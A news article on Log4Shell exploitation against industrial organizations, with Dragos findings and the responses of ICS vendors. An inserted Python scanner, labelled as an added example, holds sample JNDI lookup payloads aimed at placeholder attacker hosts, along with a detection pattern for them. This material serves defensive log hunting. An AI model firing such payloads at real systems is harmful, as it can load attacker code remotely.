Industrial Organizations Targeted in Log4Shell Attacks
Industrial organizations are exposed to attacks leveraging a recently disclosed — and already exploited — vulnerability affecting the widely used Log4j logging utility.
Industrial cybersecurity firm Dragos reported on Monday that it has observed both attempted and successful exploitation of the vulnerability, and the company says it has already coordinated the takedown of a malicious domain used in attacks.
The critical vulnerability, tracked as CVE-2021-44228 and dubbed Log4Shell and LogJam, came to light in late November, and it was patched on December 6. Evidence suggests that exploitation of the vulnerability may have started on December 1, but mass exploitation began around December 9, after weaponized proof-of-concept (PoC) exploits were made available.
Apache Log4j is a Java-based logging tool that is included in various open source libraries, and is directly embedded in many popular software applications.
A security hole affecting the cross-platform library, specifically its Java Naming and Directory Interface (JNDI) lookup feature, can be exploited for remote code execution by getting the targeted system to log a specially crafted string.
Many threat groups have exploited the vulnerability — which can be used to take complete control of a system — to deliver various types of malware.
“This cross-cutting vulnerability, which is both vendor agnostic and affects both proprietary and open-source software, will leave a wide swathe of industries exposed to remote exploitation, to include electric power, water, food and beverage, manufacturing, transportation, and more,” Dragos said.
“Log4j is found in popular open-source repositories used in numerous industrial applications, such as Object Linking and Embedding for Process Control (OPC) Foundation’s Unified Architecture (UA) Java Legacy. Additionally, adversaries can leverage this vulnerability in proprietary Supervisory Control and Data Acquisition (SCADA) and Energy Management Systems (EMS) which make use of Java in their codebase,” it added.
The company noted that while the Lightweight Directory Access Protocol (LDAP) has been the primary attack vector, it has observed attack attempts leveraging DNS and Remote Method Invocation (RMI).
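The exploitation path described above (a JNDI lookup string that reaches a log line) and the three vectors Dragos lists give defenders a concrete thing to hunt for in web, application and proxy logs. The following scanner is an added example, not code from the article or from Dragos; the log lines and hostnames in it are constructed placeholders, and it flags the LDAP, DNS and RMI schemes named in the article while still reporting any other JNDI scheme it sees.

```python
import re
from dataclasses import dataclass

# Constructed sample log lines (not from the article); hosts are placeholders.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - "GET /api HTTP/1.1" 404 "-" "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "-" "${JNDI:rmi://evil.example:1099/x}"',
    'X-Api-Version: ${jndi:dns://canary.example/probe}',
]

# Matches the lookup syntax the article describes: ${jndi:<scheme>://<host>...}
# Case-insensitive, because the lookup prefix is not case-sensitive.
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:\s*([a-z]+)://([^/\s:}]+)', re.IGNORECASE)

# Vectors named in the article: LDAP as the primary one, plus DNS and RMI.
KNOWN_VECTORS = {"ldap", "ldaps", "dns", "rmi"}


@dataclass
class Finding:
    line_no: int      # 1-based index into the scanned input
    scheme: str       # lookup scheme, lower-cased
    host: str         # callback host the lookup would contact
    known_vector: bool  # True if the scheme is one the article names


def scan_lines(lines):
    """Return one Finding per JNDI lookup found in the given log lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        for m in JNDI_RE.finditer(line):
            scheme = m.group(1).lower()
            findings.append(Finding(n, scheme, m.group(2), scheme in KNOWN_VECTORS))
    return findings


def callback_hosts(findings):
    """Unique callback hosts, e.g. for egress blocking or takedown requests."""
    return sorted({f.host for f in findings})


if __name__ == "__main__":
    found = scan_lines(SAMPLE_LOGS)
    for f in found:
        print(f)
    print("hosts to block/investigate:", callback_hosts(found))
```

Run it over exported access or application logs; a hit is evidence of an attempt, not of a successful exploit, so correlate any callback host with outbound connection logs from the affected host.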
Dragos pointed out that robust segmentation between IT and OT networks significantly reduces the risk of impact on industrial systems, but the company warned that threat actors may develop more sophisticated Log4Shell exploits once network defenders address the easier exploit paths.
ICS vendors respond to Log4Shell
Industrial control system (ICS) manufacturers have started responding to Log4Shell.
As of Monday night, Siemens has confirmed that 17 of its products are affected by CVE-2021-44228 and there are many more that are still being analyzed. The German industrial giant has started releasing patches and it has provided mitigation advice.
Products confirmed to be affected include E-Car OC, EnergyIP, Geolus, Industrial Edge Management, Logo! Soft Comfort, Mendix, MindSphere, Operation Scheduler, Siguard DSA, Simatic WinCC, SiPass, Siveillance, Solid Edge, and Spectrum Power.
Schneider Electric has also released an advisory, but it’s still working on determining which of its products are affected. In the meantime, it has shared general mitigations to reduce the risk of attacks.
Inductive Automation, which provides SCADA software and industrial automation solutions, told customers that it has conducted a full audit and determined that its products are not impacted.
“Software vendors in the OT space are in a unique position to help their clients by ideally having tabs on their software, but also within environments they help maintain (e.g. service agreement),” Ron Brash, VP of technical research at aDolus Technology, told SecurityWeek.
“Unfortunately, there are varying levels of component awareness when it comes to vendor supply chain security, and this is particularly problematic for current and past products where accurate component inventories are lacking or source code/build chains are poorly understood,” Brash said.